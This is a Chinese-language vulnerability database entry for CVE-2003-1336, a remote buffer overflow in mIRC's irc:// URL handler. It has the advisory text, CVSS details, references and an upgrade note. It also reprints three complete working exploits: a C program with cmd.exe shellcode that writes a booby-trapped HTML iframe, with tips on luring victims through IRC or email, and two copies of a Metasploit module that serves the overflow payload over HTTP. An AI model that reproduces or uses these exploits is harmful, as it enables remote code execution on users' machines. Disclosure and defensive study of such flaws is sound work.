CVE-2003-1336
CVSS9.3
发布时间 :2003-12-31 00:00:00
修订时间 :2010-06-23 00:00:00
NMCOEP    

[原文]Buffer overflow in mIRC before 6.11 allows remote attackers to execute arbitrary code via a long irc:// URL.


[CNNVD]mIRC IRC URL缓冲区溢出漏洞(CNNVD-200312-326)

        
        mIRC是一款流行的在线聊天程序。
        mIRC在处理'irc://'类型URL时缺少充分缓冲区边界检查,远程攻击者可以利用这个漏洞对目标用户进行缓冲区溢出攻击,可能以mIRC进程权限在系统上执行任意指令。
        当mIRC安装后,会对'irc://'类型URL注册一个处理器,但是对超长的'irc://'URL缺少充分的边界缓冲区检查,攻击者如果构建恶意的URL,诱使mIRC访问,可触发溢出,精心构建URL数据可能以mIRC进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1336
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1336
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-326
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/8819
(PATCH)  BID  8819
http://www.securiteam.com/windowsntfocus/6M00B0U8KE.html
(PATCH)  MISC  http://www.securiteam.com/windowsntfocus/6M00B0U8KE.html
http://secunia.com/advisories/9996
(VENDOR_ADVISORY)  SECUNIA  9996
http://archives.neohapsis.com/archives/ntbugtraq/2003-q4/0060.html
(PATCH)  NTBUGTRAQ  20031015 mIRC Buffer Overflow in irc protocol handler
http://xforce.iss.net/xforce/xfdb/13405
(UNKNOWN)  XF  mirc-ircprotocol-execute-code(13405)
http://www.osvdb.org/2665
(UNKNOWN)  OSVDB  2665

- 漏洞信息

mIRC IRC URL缓冲区溢出漏洞
高危 缓冲区溢出
2003-12-31 00:00:00 2007-09-24 00:00:00
远程  
        
        mIRC是一款流行的在线聊天程序。
        mIRC在处理'irc://'类型URL时缺少充分缓冲区边界检查,远程攻击者可以利用这个漏洞对目标用户进行缓冲区溢出攻击,可能以mIRC进程权限在系统上执行任意指令。
        当mIRC安装后,会对'irc://'类型URL注册一个处理器,但是对超长的'irc://'URL缺少充分的边界缓冲区检查,攻击者如果构建恶意的URL,诱使mIRC访问,可触发溢出,精心构建URL数据可能以mIRC进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Khaled Mardam-Bey
        -----------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Khaled Mardam-Bey mIRC 6.1:
        Khaled Mardam-Bey Upgrade mirc611.exe
        
        http://www.mirc.com/get.html

- 漏洞信息 (112)

mIRC 6.1 "IRC" Protocol Remote Buffer Overflow Exploit (EDBID:112)
windows remote
2003-10-21 Verified
0 blasty
N/A [点击下载]
/** remote mirc < 6.11 exploit by blasty
 **
 ** TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148
 **
 ** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised
 ** nobody had written an exploit yet. So I decided to start writing one.
 ** Since this was my first time coding a exploit for windows, it took some
 ** research before I got the hang of it. (Ollydbg is much more confusing then GDB btw :P)
 **
 ** This exploits (ab)uses the bug in irc:// URI handling. It contains a buffer-
 ** overflow, and when more then 998 bytes are given EIP will be overwritten.
 ** 
 ** At first I was thinking of a simple solution to get this exploitable. Since
 ** giving an URI with > 998 chars to someone on IRC is simply NOT done :)
 ** Then I remember the iframe-irc:// flaw found by uuuppzz [2]
 **
 ** This exploit will write an malicious HTML file containing an iframe executing the
 ** irc:// address. So you can give this to anyone on IRC for example ;)
 ** The shellcode included does only execute cmd.exe, because I don't want to be this
 ** a scriptkiddy util. But, replacing the shellcode with your own is also possible.
 ** An 400 bytes shellcode (bindshell etc.) easily fits in the buffer, but it may require
 ** some tweaking.
 ** After exiting the cmd.exe mIRC will crash, so shellcode its not 100% clean, but who carez :)
 **
 ** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started.
 ** mIRC will start automatically when an irc:// is executed, so you can also send somebody
 ** and HTML email containing the evil HTML code. (only for poor clients like Outlook Express :P)
 **
 **/

#include <stdio.h>


/* Stupid cmd.exe exec shellcode. hey! I r !evil ;) */
unsigned char shellcode[] =
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
	"\x44\x80\xbf\x77"			//	0x78bf8044 <- adress of system()
	"\xff\xd0";				//  	call    system()
	

char jmpback[] =
        "\xE9\xCF\xFB\xFF\xFF"; // my leet negative JMP shellcode :)

char buffer[1100], fstring[1300]; // heh, need to clean this up

int main(int argc, char *argv[]) {
	FILE *evil;

	fprintf(stdout, "---------------------------------------------\n"
			"mIRC < 6.11 remote exploit by blasty@geekz.nl\n"
                                                "Exploit downloaded on www.k-otik.com\n"
			"---------------------------------------------\n\n");

	// NOPslides are cool
	memset(buffer, 0x90, sizeof(buffer) - 1);

	// place shellcode in buffer
	memcpy(buffer + 20, shellcode, strlen(shellcode));

	// took this one from ntdll.dll (jmp esp)
	*(long *)&buffer[994] = 0x77F4801C;

	// place jmpback shellcode in buffer
	memcpy(buffer + 20 + strlen(shellcode) + 1010, jmpback, strlen(jmpback));

	printf("[+] Evil buffer constructed\n");


	// open HTML file for writing
	if((evil = fopen("index.html", "a+")) != NULL) {

		// construct evil string :)
		sprintf(fstring, "<iframe src=\"irc://%s\"></iframe>", buffer);

		// write string to file
		fputs(fstring, evil);

		// close file
		fclose(evil);

		printf("[+] Evil HTML file written!\n");
		return(0);
	} else {
		// uh oh.. :/
		fprintf(stderr, "ERROR: Could not open index.html for writing!\n");
		exit(1);
	}
}


// milw0rm.com [2003-10-21]
		

- 漏洞信息 (16530)

mIRC IRC URL Buffer Overflow (EDBID:16530)
windows remote
2010-05-09 Verified
0 metasploit
N/A [点击下载]
##
# $Id: mirc_irc_url.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'mIRC IRC URL Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in mIRC 6.1. By
				submitting an overly long and specially crafted URL to
				the 'irc' protocol, an attacker can overwrite the buffer
				and control program execution.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC',
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2003-1336'],
					[ 'OSVDB', '2665'],
					[ 'BID', '8819' ],
				],

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},

			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English All',   { 'Offset' => 1442, 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', { 'Offset' => 1414, 'Ret' => 0x71aa32ad } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Oct 13 2003',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		filler =  rand_text_alphanumeric(target['Offset'], payload_badchars)
		seh    = generate_seh_payload(target.ret)
		sploit = filler + seh

		# Build the HTML content
		content = "<html><iframe src='irc://#{sploit}'></html>"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- 漏洞信息 (F83236)

mIRC IRC URL Buffer Overflow (PacketStormID:F83236)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,protocol
CVE-2003-1336
[点击下载]

This Metasploit module exploits a stack overflow in mIRC 6.1. By submitting an overly long and specially crafted URL to the 'irc' protocol, an attacker can overwrite the buffer and control program execution.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'mIRC IRC URL Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in mIRC 6.1. By
				submitting an overly long and specially crafted URL to
				the 'irc' protocol, an attacker can overwrite the buffer 
				and control program execution.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC', 
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2003-1336'],
					[ 'OSVDB', '2665'],
					[ 'BID', '8819' ],
				],

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},

			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English All',   { 'Offset' => 1442, 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', { 'Offset' => 1414, 'Ret' => 0x71aa32ad } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Oct 13 2003',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		filler =  rand_text_alphanumeric(target['Offset'], payload_badchars)
		seh    = generate_seh_payload(target.ret)
		sploit = filler + seh

		# Build the HTML content
		content = "<html><iframe src='irc://#{sploit}'></html>"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)		
	end

end
    

- 漏洞信息

2665
mIRC IRC URI Handler Overflow
Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- 漏洞描述

mIRC contain a flaw that could allow an attacker to remotely compromise the system with a buffer overflow. If a malicious attacker sends an overly long, specially crafted hostname using the irc: URI the buffer will overflow and allow the attacker to execute arbitrary code.

- 时间线

2003-10-14 2003-10-14
Unknow Unknow

- 解决方案

Upgrade to version 6.11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站